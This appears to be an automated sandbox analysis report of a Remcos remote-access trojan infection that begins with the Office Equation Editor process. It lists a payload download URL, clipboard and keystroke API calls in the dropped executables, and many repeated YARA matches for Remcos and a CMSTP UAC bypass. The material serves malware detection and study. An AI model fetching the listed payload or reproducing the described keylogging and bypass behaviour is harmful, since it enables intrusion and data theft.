              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.000000000066B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.grupodulcemar.pe/
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.grupodulcemar.pe/HKP098767890HJ.exe
              Source: EQNEDT32.EXE, 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.grupodulcemar.pe/HKP098767890HJ.exej
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.grupodulcemar.pe/HKP098767890HJ.exek
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.grupodulcemar.pe/HKP098767890HJ.exessC:
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.000000000066B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.grupodulcemar.pe/m
              Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
              Source: unknown HTTPS traffic detected: 161.132.57.101:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00874164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00874164
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_013D4164
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00873F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00873F66
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_0086001C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0088CABC
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013ECABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_013ECABC

              E-Banking Fraud

              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTR

              System Summary

Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
